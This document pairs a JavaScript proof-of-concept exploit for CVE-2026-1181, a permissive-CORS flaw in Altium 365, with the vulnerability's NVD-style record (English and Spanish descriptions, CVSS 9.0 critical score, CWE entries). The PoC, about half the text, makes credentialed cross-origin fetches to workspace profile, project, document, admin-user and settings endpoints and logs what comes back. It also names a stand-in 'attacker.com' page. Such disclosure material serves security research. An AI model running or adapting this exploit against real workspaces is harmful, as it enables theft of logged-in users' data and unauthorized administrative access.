CVE-2026-1181

// CVE-2026-1181 PoC - Altium 365 CORS Misconfiguration Exploit // This PoC demonstrates how an attacker can exploit the permissive CORS policy async function exploitAltiumCORS() { const targetUrl = 'https://altium365.example.com/api/workspace/user/profile'; const maliciousPage = 'https://attacker.com/evil-page.html'; try { // Step 1: Send cross-origin request with credentials const response = await fetch(targetUrl, { method: 'GET', credentials: 'include', // Include cookies for authenticated request mode: 'cors' // Enable CORS request }); // Step 2: If CORS allows credentials, we can read the response const data = await response.json(); console.log('Exploited data:', data); // Step 3: Access authenticated workspace APIs await accessWorkspaceAPIs(); } catch (error) { console.error('CORS exploit failed:', error); } } async function accessWorkspaceAPIs() { const endpoints = [ '/api/workspace/projects', '/api/workspace/documents', '/api/workspace/admin/users', '/api/workspace/settings' ]; for (const endpoint of endpoints) { try { const response = await fetch(`https://altium365.example.com${endpoint}`, { credentials: 'include', mode: 'cors' }); const data = await response.json(); console.log(`Data from ${endpoint}:`, data); } catch (e) { console.error(`Failed to access ${endpoint}`); } } } // Trigger exploitation // Note: Requires user to be logged into Altium 365 and visit this page exploitAltiumCORS();

{"cve": {"id": "CVE-2026-1181", "sourceIdentifier": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "published": "2026-01-19T13:16:20.543", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Altium 365 workspace endpoints were configured with an overly permissive Cross-Origin Resource Sharing (CORS) policy that allowed credentialed cross-origin requests from other Altium-controlled subdomains, including forum.live.altium.com. As a result, JavaScript executing on those origins could access authenticated workspace APIs in the context of a logged-in user. When chained with vulnerabilities in those external applications, this misconfiguration enables unauthorized access to workspace data, administrative actions, and bypass of IP allowlisting controls, including in GovCloud environments."}, {"lang": "es", "value": "Los puntos finales del espacio de trabajo de Altium 365 fueron configurados con una política de Intercambio de Recursos de Origen Cruzado (CORS) excesivamente permisiva que permitía solicitudes de origen cruzado con credenciales desde otros subdominios controlados por Altium, incluyendo forum.live.altium.com. Como resultado, el JavaScript que se ejecutaba en esos orígenes podía acceder a las API autenticadas del espacio de trabajo en el contexto de un usuario con sesión iniciada. Cuando se encadena con vulnerabilidades en esas aplicaciones externas, esta mala configuración permite el acceso no autorizado a los datos del espacio de trabajo, acciones administrativas y la elusión de los controles de inclusión en lista blanca de IP, incluso en entornos GovCloud."}], "metrics": {"cvssMetricV31": [{"source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-942"}]}], "references": [{"url": "https://www.altium.com/platform/security-compliance/security-advisories", "source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79"}]}}